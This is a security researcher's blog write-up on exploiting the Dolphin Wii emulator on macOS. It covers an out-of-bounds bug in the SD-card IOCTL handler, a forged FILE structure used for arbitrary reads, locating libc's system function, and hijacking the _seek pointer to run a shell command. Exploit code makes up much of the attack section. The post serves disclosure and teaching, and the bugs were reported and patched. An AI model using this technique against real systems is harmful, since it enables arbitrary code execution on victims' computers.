Dolphin is a Wii emulator, and a consistent source of interesting technical problems. In the interests of learning more about Dolphin, Wii, PowerPC, and exploitation, I discovered a handful of bugs, and created an ISO file that can run arbitrary code on the host, portably and reliably. This has been an interest of mine since I spent some time exploiting a partial GameCube emulator in the last Defcon CTF finals, and I decided to actually explore it following a tweet from a Dolphin developer.

To be clear, Dolphin is not a sandbox, and is not designed to be secure. You should not use it to emulate software from untrusted sources. Piracy is a very good way to get yourself hacked. If you run something in Dolphin you should understand that it can do anything on your computer. These bugs will be fixed, but there will be plenty of other bugs in the future.

These issues are not “vulnerabilities”, it’s just a collection of interesting tricks that allow games running on Dolphin to execute arbitrary code. I do call it “exploitation”, because the same techniques can work on software which actually has security requirements.

Anyway, enough disclaimers, let’s dig in. In Part 1, I’ll show how to make a 100% reliable exploit for Dolphin on macOS, which is portable to every version containing a single, simple bug.

Wii IOS IPC HLE

Enough three-letter initialisms? Let’s start with some definitions. (I’ve included links to the WiiBrew wiki, which was a valuable source.)

IOS is the operating system that the Wii provides to games running on it. It runs on a separate ARM coprocessor in the Wii. This provides a variety of services, for example allowing games to read and write files, and communicate over the network.

IPC stands for inter-processor communication, and is the means by which the PowerPC processor running the game code communicates with IOS. This is implemented using a number of memory-mapped I/O registers.

HLE stands for high-level emulation. Instead of requiring a copy of IOS to be fully emulated, Dolphin provides high-level (C++) implementations of all the functionality that IOS usually provides to games.

This provides a considerable attack surface, and is where I began my search for interesting bugs. After a little exploring, I came across the following code (abbreviated):

CWII_IPC_HLE_Device_sdio_slot0::IOCtl(u32 _CommandAddress) { u32 Cmd = Memory::Read_U32(_CommandAddress + 0xC); u32 BufferIn = Memory::Read_U32(_CommandAddress + 0x10); u32 BufferOut = Memory::Read_U32(_CommandAddress + 0x18); switch (Cmd) { case IOCTL_READHCR: { u32 reg = Memory::Read_U32(BufferIn); if (reg >= 0x200) { WARN_LOG(WII_IPC_SD, "IOCTL_READHCR out of range"); break; } u32 val = m_Registers[reg]; INFO_LOG(WII_IPC_SD, "IOCTL_READHCR 0x%08x - 0x%08x", reg, val); // Just reading the register Memory::Write_U32(val, BufferOut); } break; // ... } // ... }

This code looks great, it’s bounds checked and everything. The catch, of course, is in the definition:

class CWII_IPC_HLE_Device_sdio_slot0 : public IWII_IPC_HLE_Device { // ... u32 m_Status; u32 m_BlockLength; u32 m_BusWidth; u32 m_Registers[0x200 / 4]; File::IOFile m_Card; // ... };

The classic byte/word mixup allows reading from anywhere up to index 511 in a 128 element array. Better still, there’s a IOCTL_WRITEHCR implemented in the same method with the same bug, allowing memory corruption. (To my surprise, this bug was introduced by respected exploit writer comex in September 2013.)

It took me a lot of work to create an ISO file that reproduce this bug, using only Python, PyCrypto, and a PowerPC toolchain, and I learned a lot of interesting lessons. But after thoroughly reinventing a number of wheels, the proof-of-concept was only a few lines:

int slot0 = open("/dev/sdio/slot0", MODE_RW); // overwrite the low 32-bits of the File::IOFile u32 input[5] = {129, 0, 0, 0, 0x41414141}; ioctl(fd, IOCTL_WRITEHCR, &input, sizeof input, 0, 0); // crash by attempting to read from the File::IOFile u8 out[8]; slot0_read_multiple_block(fd, &out, 0, sizeof (out));

ASLR in Dolphin

Dolphin avoids randomised addresses in several places for a variety of reasons. In recent versions, the binary is loaded at a fixed location below 0x80000000 (2GB) so that certain x86 instructions emitted by the JIT can access it. The drawback of using this memory is that it can change significantly every time the program is recompiled or the source changes. But this technique is very useful if we know the exact version we’re exploiting and don’t need to be portable.

Also on macOS and Linux, the virtual memory of the emulated console is mapped at a fixed address (0x2300000000). This is part of the “fastmem” optimisation, where Dolphin uses a 16GB range of the 64-bit address space to represent memory in the same layout as is seen by the 32-bit processor in the Wii. (This is an oversimplification, but it’s close enough for our purposes.)

#ifdef _WIN32 // 64 bit u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE); VirtualFree(base, 0, MEM_RELEASE); return base; #else // Very precarious - mmap cannot return an error when trying to map already used pages. // This makes the Windows approach above unusable on Linux, so we will simply pray... return reinterpret_cast<u8*>(0x2300000000ULL); #endif

This is nice and predictable for attacks which required arbitrary data at a known location. On Windows there’s no deliberate randomisation, but it’s not 100% predictable (due to some other factors), so we can’t write a 100% reliable exploit this way.

Even with full ASLR, the bug described in the previous section allows us to leak some data from the heap, potentially bypassing ASLR. But for now I’ll focus on using the fastmem region at 0x2300000000 to exploit macOS.

Corrupting an IOFile

Now we have two options, corrupt the following member of the structure (the IOFile), or corrupt the following heap data. There’s a lot more heap data to chose from, but as the CWII_IPC_HLE_Device_sdio_slot0 class is allocated only once during initialisation, we don’t have much control over the following data, and it will be different on different platforms, and change randomly on some platforms, so the IOFile is a much more appealing option.

It has only has two members we can corrupt:

class IOFile : public NonCopyable { public: // ... std::FILE* m_file; bool m_good; };

It turns out there’s exactly one pointer we can overwrite. At first glance this seems hard to exploit, but it turns out that the FILE structure is responsible for managing input and output buffers, and is extremely amenable to building an arbitrary memory read/write primitive.

Let’s take a look at how the IOFile is used by slot0 (abbreviated again):

u32 CWII_IPC_HLE_Device_sdio_slot0::ExecuteCommand(u32 _BufferIn, u32 _BufferInSize, u32 _rwBuffer, u32 _rwBufferSize, u32 _BufferOut, u32 _BufferOutSize) { // The game will send us a SendCMD with this information. To be able to read and write // to a file we need to prepare a 0x10 byte output buffer as response. struct Request req = Memory::ReadRequest(_BufferIn); u32 ret = RET_OK; switch (req.command) { // ... case READ_MULTIPLE_BLOCK: { if (m_Card) { u32 size = req.bsize * req.blocks; if (!m_Card.Seek(req.arg, SEEK_SET)) ERROR_LOG(WII_IPC_SD, "Seek failed WTF"); if (m_Card.ReadBytes(Memory::GetPointer(req.addr), size)) { DEBUG_LOG(WII_IPC_SD, "Outbuffer size %i got %i", _rwBufferSize, size); } else { ERROR_LOG(WII_IPC_SD, "Read Failed - error: %i, eof: %i", ferror(m_Card.GetHandle()), feof(m_Card.GetHandle())); ret = RET_FAIL; } } } Memory::Write_U32(0x900, _BufferOut); break; } // ... }

The Seek and ReadBytes translate pretty much directly to fread and fseek, which are part of the C standard library, implemented by Libc on macOS. You can download the source from opensource.apple.com.

The FILE structure is pretty complicated, but there are a few things to note. First, there are function pointers, which we could use to get control of RIP. However, we don’t know any fixed address that’s safe to call, so we must also note the flags, which we can use to prevent the function pointers from being used, while constructing an arbitrary read.

The following is the (again abbreviated) structure definition:

typedef struct __sFILE { unsigned char *_p; /* current position in (some) buffer */ int _r; /* read space left for getc() */ int _w; /* write space left for putc() */ short _flags; /* flags, below; this FILE is free if 0 */ short _file; /* fileno, if Unix descriptor, else -1 */ struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */ /* operations */ void *_cookie; /* cookie passed to io functions */ int (*_close)(void *); int (*_read) (void *, char *, int); fpos_t (*_seek) (void *, fpos_t, int); int (*_write)(void *, const char *, int); /* separate buffer for long sequences of ungetc() */ struct __sFILEX *_extra; /* additions to FILE to not break ABI */ fpos_t _offset; /* current lseek offset (see WARNING) */ } FILE; #define __SRD 0x0004 /* OK to read */ #define __SWR 0x0008 /* OK to write */ #define __SRW 0x0010 /* open for reading & writing */ #define __SOPT 0x0400 /* do fseek() optimisation */ #define __SOFF 0x1000 /* set iff _offset is in fact correct */

Let’s perform an arbitrary read. First, we need to make sure we hit the “fseek() optimisation” path that doesn’t call the _seek function pointer, and then have enough data available in the buffer that it doesn’t need to call the _read function pointer. We can do this as follows:

Set the __SOPT and __SOFF flags to avoid calling seek.

and flags to avoid calling seek. Set the _seek function pointer to non-NULL to allow seeking.

function pointer to non-NULL to allow seeking. Set the __SRD flag to allow reading.

flag to allow reading. Make the _offset and _r fields are greater than the read size.

and fields are greater than the read size. Make the _p and _bf._base fields point to the source location for the read.

and fields point to the source location for the read. The _extra pointer must point to valid memory, for the lock.

All in all the function ends up looking like this:

static void slot0_osx_read(int fd, void *out, u64 hostaddr, u32 size) { osx_FILE file; memset(&file, 0, sizeof file); osx_FILEX extra; memset(&extra, 0, sizeof extra); file._extra = address_to_host(&extra); file._flags = OSX_SOPT | OSX_SOFF | OSX_SRD; file._seek = 1; // non-null file._p = hostaddr; file._bf._base = hostaddr; file._offset = size + 1; file._r = size + 1; // replace the FILE* to point to our data u64 saved_fileptr = slot0_read_fileptr(fd); slot0_write_fileptr(fd, address_to_host(&file)); slot0_read_multiple_block(fd, out, 0, size); // restore slot0_write_fileptr(fd, saved_fileptr); }

There’s an interesting problem of endian that I haven’t mentioned. Because the PowerPC architecture our code is running on is big-endian, and the x86 architecture Dolphin is running on is little-endian, we need to swap every field in the structure. I borrowed a trick from LLVM, which uses C++ operator overloading to transparently do endian conversions, so the code above is correct – it’s just that the fields are declared as host_u32 and host_ptr types in the structure definition, not int and unsigned char * as in the Libc source code.

Finding System

We’ll finish the exploit by calling system, but first we have to find it. system is a function in libc, so we can start by finding libc. Fortunately, we know where the original FILE object is (because we can leak it using the out of bounds read), and so we can read out the pointers to the true implementation of the _read function, which is within Libc.

We can then search backwards from this point to find the Mach-O header (marked by the magic number 0xFEEDFACF at the start of a page). And finally, we just need to do exactly what dyld does, parse the Mach-O header, find the export trie and lookup the string _system. Fortunately you can find the source at opensource.apple.com, which makes things a bit easier, but it still takes quite a lot of code.

The implementation is shown in the code linked below.

Running code

Now we just need to call system. We’ve gone to great lengths to avoid calling _seek, but it’s actually a really good technique, because _seek is called with _cookie as the first argument:

ret = (*fp->_seek)(fp->_cookie, offset, whence);

So now we know where system is, we can invoke it with an arbitrary string as follows:

file._cookie = address_to_host("open -a Calculator"); file._seek = system_ptr; file._flags = 0; slot0_write_fileptr(slot0, address_to_host(&file)); slot0_read_multiple_block(slot0, &ignored, 0x1234, sizeof ignored); slot0_write_fileptr(slot0, saved_fileptr);

When Dolphin attempts the read, it will call system and the shell command will run.

After all this the runtime is stable, so it could easily be patched into a pirated game. (Don’t pirate software, even emulated software. With Dolphin, and most other emulators, you’d be taking exactly the same risk as pirating native games, which is just a terrible idea.)

Final Notes

This exploit works on Dolphin 3.5-2313 through to Dolphin 5.0-1296 on OS X (I didn’t test them all, but a pretty representative sample). It hopefully illustrates how carefully choosing corruption targets and techniques can lead to very reliable and portable exploits.

There are a lot of things I didn’t cover, but I hope it gave some insight into Dolphin, and macOS’s C library implementation.

The full code for the macOS exploit is on gist.github.com – if you have any questions, let me know. The hard part is arguably setting up the build environment and generating a Wii disc, but there are plenty of other resources that can help with that.

The patches for the other bugs I disclosed are in PR #4447. Thanks to JosJuice for fixing the bugs quickly.

In Part 2, I’ll explain how to exploit this on Windows, turn the FILE* overwrite into an arbitrary write as well, and look at another information-leak bug.